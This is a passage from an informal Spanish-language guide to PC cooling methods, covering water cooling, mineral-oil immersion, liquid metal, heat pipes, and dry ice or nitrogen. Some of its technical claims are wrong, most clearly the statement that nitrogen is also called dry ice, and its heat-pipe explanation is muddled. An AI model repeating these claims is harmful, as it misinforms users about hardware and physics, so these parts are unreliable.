esta tomara contacto, y retirara el calor que luego será disipado fuera del sistema. Súper recomendable, siempre y cuando se tengan las precauciones necesarias para poder llevarlo a cabo. Todos sabemos que el agua y la electricidad no son muy buenas compañías, es por esto que si llegáramos a provocar un filtrado del líquido dentro de nuestro hardware, seria catastrófico (siempre hablando de gente sin experiencia). Siempre que se tengan las prevenciones, este método seria muy bien recomendable para toda PC de casa. Refrigeración por inmersión: Su método no es muy recomendable, pero no hay que decir que no es efectible. Seria algo menos así, conseguir un acuario, y meter nuestro hardware dentro, y llenarlo con aceite mineral (este es capas de disipar rápida y efectivamente el calor). Si bien no esta diseñado para cualquier persona, pero siempre es bueno saber que existe un método que quizás se te ocurrió alguna vez preguntarte. Refrigeración con metal líquido: Es similar al funcionamiento del Watercooling pero con el cambio de que usaremos derivados de metales líquidos como componente disipador. Refrigeración tipo Heatpipes: Este método muy poco usual, pero muy efectivo, esta basado principalmente en leyes de la física. Explicando brevemente, diríamos que tenemos un recipiente con fluido, siempre a una temperatura estándar. Al entrar en contacto con la superficie de temperatura elevada, el líquido conduce la temperatura elevada hacia la superficie y hace que el más fresco baje. El aire nuevo de la superficie es llevado por un sistema de conductos hasta un disipador, que lo que hace es retirar la temperatura y condensar nuevamente el fluido para ser reutilizado. Usualmente, son acompañados por un sistema de cooler como ayuda en disipación, lo que los hace aun más eficientes. Refrigeración con Hielo Seco: Quizás uno de los métodos altamente efectivos y más llamativos de toda esta guía. Su método es recomendable, pero siempre hay desventajas. Explicando en principio como funciona, diríamos que necesitamos Nitrógeno o también llamado Hielo Seco, como método de refrigeración. Este liquido, es capas de llegar a temperaturas cercanas a los -200ºC, y al estar en contacto con la superficie de temperatura elevada, no tiene problemas en lo absoluto. Usualmente se utiliza el método en campeonatos de Overclocking, siempre trabajando con prudencia. Podríamos trabajar en nuestra PC con un sistema así, pero la desventaja seria que no podemos apagar nuestra PC, ya que haríamos un cambio brusco de temperatura, ocasionando que el microprocesador o la superficie a refrigerar, sufra daños graves. FIN